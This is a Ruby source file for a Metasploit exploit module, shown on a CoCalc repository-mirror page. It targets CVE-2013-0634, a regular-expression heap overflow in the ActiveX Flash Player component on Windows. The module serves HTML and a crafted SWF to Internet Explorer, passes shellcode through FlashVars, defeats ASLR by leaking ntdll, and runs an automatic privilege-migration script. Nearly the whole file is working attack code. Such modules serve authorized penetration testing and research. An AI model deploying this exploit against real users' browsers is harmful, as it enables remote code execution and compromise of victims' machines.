CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/browser/adobe_flash_regex_value.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::BrowserExploitServer

10


11
  def initialize(info={})

12
    super(update_info(info,

13
      'Name'           => "Adobe Flash Player Regular Expression Heap Overflow",

14
      'Description'    => %q{

15
        This module exploits a vulnerability found in the ActiveX component of Adobe

16
        Flash Player before 11.5.502.149. By supplying a specially crafted swf file

17
        with special regex value, it is possible to trigger a memory corruption, which

18
        results in remote code execution under the context of the user, as exploited in

19
        the wild in February 2013. This module has been tested successfully with Adobe

20
        Flash Player 11.5 before 11.5.502.149 on Windows XP SP3 and Windows 7 SP1 before

21
        MS13-063, since it takes advantage of a predictable SharedUserData in order to

22
        leak ntdll and bypass ASLR.

23
      },

24
      'License'        => MSF_LICENSE,

25
      'Author'         =>

26
        [

27
          'Unknown',                   # malware sample

28
          'Boris "dukeBarman" Ryutin', # msf exploit

29
          'juan vazquez'               # ActionScript deobfuscation and cleaning

30
        ],

31
      'References'     =>

32
        [

33
          [ 'CVE', '2013-0634' ],

34
          [ 'OSVDB', '89936'],

35
          [ 'BID', '57787'],

36
          [ 'URL', 'http://malwaremustdie.blogspot.ru/2013/02/cve-2013-0634-this-ladyboyle-is-not.html' ],

37
          [ 'URL', 'http://malware.dontneedcoffee.com/2013/03/cve-2013-0634-adobe-flash-player.html' ],

38
          [ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2013/02/lady-boyle-comes-to-town-with-a-new-exploit.html' ],

39
          [ 'URL', 'http://labs.alienvault.com/labs/index.php/2013/adobe-patches-two-vulnerabilities-being-exploited-in-the-wild/' ],

40
          [ 'URL', 'http://eromang.zataz.com/tag/cve-2013-0634/' ]

41
        ],

42
      'Payload'        =>

43
        {

44
          'Space' => 1024,

45
          'DisableNops' => true

46
        },

47
      'DefaultOptions'  =>

48
        {

49
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',

50
          'Retries'              => false

51
        },

52
      'Platform'       => 'win',

53
      'BrowserRequirements' =>

54
        {

55
          :source  => /script|headers/i,

56
          :activex => [

57
            {

58
              clsid: "{D27CDB6E-AE6D-11cf-96B8-444553540000}",

59
              method: "LoadMovie"

60
            }

61
          ],

62
          :os_name => OperatingSystems::Match::WINDOWS,

63
          :ua_name => Msf::HttpClients::IE,

64
          :flash   => lambda { |ver| ver =~ /^11\.5/ && ver < '11.5.502.149' }

65
        },

66
      'Targets'        =>

67
        [

68
          [ 'Automatic', {} ]

69
        ],

70
      'Privileged'     => false,

71
      'DisclosureDate' => '2013-02-08',

72
      'DefaultTarget'  => 0))

73
  end

74


75
  def exploit

76
    @swf = create_swf

77
    super

78
  end

79


80
  def on_request_exploit(cli, request, target_info)

81
    print_status("Request: #{request.uri}")

82


83
    if request.uri =~ /\.swf$/

84
      print_status("Sending SWF...")

85
      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'})

86
      return

87
    end

88


89
    print_status("Sending HTML...")

90
    tag = retrieve_tag(cli, request)

91
    profile = browser_profile[tag]

92
    profile[:tried] = false unless profile.nil? # to allow request the swf

93
    send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})

94
  end

95


96
  def exploit_template(cli, target_info)

97


98
    swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"

99
    shellcode = get_payload(cli, target_info).unpack("H*")[0]

100


101
    html_template = %Q|<html>

102
    <body>

103
    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />

104
    <param name="movie" value="<%=swf_random%>" />

105
    <param name="allowScriptAccess" value="always" />

106
    <param name="FlashVars" value="his=<%=shellcode%>" />

107
    <param name="Play" value="true" />

108
    </object>

109
    </body>

110
    </html>

111
    |

112


113
    return html_template, binding()

114
  end

115


116
  def create_swf

117
    path = ::File.join( Msf::Config.data_directory, "exploits", "CVE-2013-0634", "exploit.swf" )

118
    swf =  ::File.open(path, 'rb') { |f| swf = f.read }

119


120
    swf

121
  end

122
end

123


124